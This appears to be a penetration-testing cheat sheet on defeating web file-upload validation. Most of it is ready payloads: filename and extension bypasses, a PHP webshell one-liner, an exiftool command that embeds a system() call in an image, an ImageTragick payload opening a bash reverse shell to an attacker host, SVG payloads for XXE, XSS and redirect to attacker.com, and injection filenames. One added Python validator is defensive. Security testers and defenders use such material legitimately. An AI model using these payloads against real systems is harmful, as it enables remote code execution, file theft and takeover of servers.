# File upload

```
Tools
    Burp > Upload Scanner
```

```
# Methodology
- Blacklisted Extension Bypass
- Content-Type Bypass
- Magic Byte Bypass
- Filename vulnerabilities

# File name validation
    # extension blacklisted:
    PHP: .phtm, .phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
    ASP: .asp, .aspx, .cer, .asa
    JSP: .jsp, .jspx, .jsw, .jsv, .jspf
    ColdFusion: .cfm, .cfml, .cfc, .dbm
    Using random capitalization: .pHp, .pHP5, .PhAr
    pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,inc
    # extension whitelisted:
    file.jpg.php
    file.php.jpg
    file.php.blah123jpg
    file.php%00.jpg
    file.php\x00.jpg
    file.php%00
    file.php%20
    file.php%0d%0a.jpg
    file.php.....
    file.php/
    file.php.\
    file.
    .html
# SecLists/Discovery/Web-Content/web-extensions.txt

# Content type bypass
    - Preserve name, but change content-type
    Content-Type: image/jpeg, image/gif, image/png
# SecLists/Miscellaneous/web/content-type.txt

# Content length:
    # Small bad code:
    <?='$_GET[x]'?>

# Magic Header Bytes
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a OR GIF89a
# en.wikipedia.org/wiki/List_of_file_signatures

# Payload Obfuscation
PHP webshell : <?=`$_GET[cmd]`?>

# Filename vulnerabilities
SQLi:               poc.js'(select*from(select(sleep(20)))a)+'.extension
LFI:                image.png../../../../../../../../../etc/passwd
XSS:                '"><img src=x onerror=alert(document.domain)>.extension
File Traversal:     ../../../logo.png
Command Injection:  ; sleep 10;

# Bypass getimagesize():
exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg

# Impact by extension
asp, aspx, php5, php, php3: webshell, rce
svg: stored xss, ssrf, xxe
gif: stored xss, ssrf
csv: csv injection
xml: xxe
avi: lfi, ssrf
html, js: html injection, xss, open redirect
png, jpeg: pixel flood attack dos
zip: rce via lfi, dos
pdf, pptx: ssrf, blind xxe

# ImageTragick
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

# XXE .svg
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>

# XSS svg
<svg onload=alert(document.domain)>.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>

# Open redirect svg
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>

# Filter Bypassing Techniques
# Upload an ASP file using the .cer or .asa extension (IIS, Windows)
# Upload an .eml file when content-type = text/HTML
# Inject a null byte: shell.php%001.jpg
# Check for .svg file upload; you can achieve stored XSS using an XML payload
# Put the file name ../../logo.png or ../../etc/passwd/logo.png to get directory traversal via the uploaded file
# Upload a large file to test for DoS using the image
# (magic number) upload shell.php, change content-type to image/gif and start the content with GIF89a; this will do the job
# If the web app allows zip upload, rename the file to pwd.jpg because the developer may handle it via a shell command
# Upload a file named with a SQL command, e.g. 'sleep(10).jpg; you may achieve SQLi if the image name is saved directly to the DB

# Advanced Bypassing techniques
# Imagetragick aka ImageMagick:
https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
https://github.com/neex/gifoeb

# Upload file tool
https://github.com/almandin/fuxploider
python3 fuxploider.py --url https://example.com --not-regex "wrong file type"

https://github.com/sAjibuu/upload_bypass
```
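The checks above only work against validators that trust the client name, the Content-Type header, or a superficial extension match. As an added example (not code from the original page), here is a server-side validator written from the defender's side that neutralises the listed tricks: it URL-decodes and null-truncates the name before looking at it, strips path components and trailing dots/spaces/CRLF, allows exactly one extension from an allowlist (so `file.jpg.php` and `file.php.jpg` both fail), ignores the client Content-Type entirely, and checks the magic bytes from the table against the extension the server itself chooses. The `ALLOWED` map, `MAX_BYTES` and the function names are this example's own assumptions.

```python
import re
import secrets
from urllib.parse import unquote

# Allowlist of extensions mapped to the magic bytes that file type must start with.
# SVG is deliberately absent: it is active content (XSS / XXE / SSRF), not an image.
ALLOWED = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
MAX_BYTES = 5 * 1024 * 1024  # assumed size cap against pixel-flood / frame-flood DoS


def normalize_name(raw: str) -> str:
    """Collapse the filename tricks from the list above before any extension check."""
    name = unquote(raw)                                # file.php%00.jpg -> file.php\x00.jpg
    name = name.split("\x00", 1)[0]                    # truncate at the first null byte, as C code would
    name = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop ../../ and trailing-slash path components
    return name.strip(" .\r\n")                        # trailing spaces, dots and %0d%0a


def validate_upload(raw_name: str, data: bytes):
    """Return (ok, stored_name_or_reason). The client's Content-Type is never consulted."""
    if len(data) > MAX_BYTES:
        return False, "too large"
    name = normalize_name(raw_name)
    # Exactly one dot, plain characters only: rejects double extensions, quotes,
    # SQL/XSS payload names, an empty stem such as ".htaccess" and an empty name.
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", name):
        return False, "bad filename"
    ext = name.rsplit(".", 1)[1].lower()  # .pHp / .PhAr are compared lower-cased
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    # Magic bytes alone do not stop "GIF89a<?php ..." or exiftool -Comment payloads;
    # pair this with a random server-side name, a non-executable upload directory
    # and, ideally, re-encoding the image so metadata and trailing bytes are dropped.
    return True, f"{secrets.token_hex(16)}.{ext}"
```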

```bash
# Build a wordlist combining the separator characters and extensions listed above.
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '...' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```

### Cheatsheet

```
upload.random123        ---  To test if random file extensions can be uploaded.
upload.php              ---  Try to upload a simple PHP file.
upload.php.jpeg         ---  To bypass the blacklist.
upload.jpg.php          ---  To bypass the blacklist.
upload.php              ---  Then change the content type of the file to image or jpeg.
upload.php*             ---  Versions 1 2 3 4 5 6 7.
upload.PHP              ---  To bypass the blacklist.
upload.PhP              ---  To bypass the blacklist.
upload.pHp              ---  To bypass the blacklist.
upload .htaccess        ---  By uploading this, [jpg,png] files can be executed as PHP with malicious code within them.
pixelFlood.jpg          ---  To test against DoS.
frameflood.gif          ---  Upload a GIF file with 10^10 frames.
Malicious zTXT          ---  Upload UBER.jpg.
Upload zip file         ---  Test against Zip Slip (only when the file upload supports zip files).
Check Overwrite Issue   ---  Upload file.txt and file.txt with different content and check if the 2nd file.txt overwrites the 1st.
SVG to XSS              ---  Check if you can upload SVG files and turn them into XSS on the target app.
SQLi via file upload    ---  Try uploading `sleep(10)-- -.jpg` as the file.
```
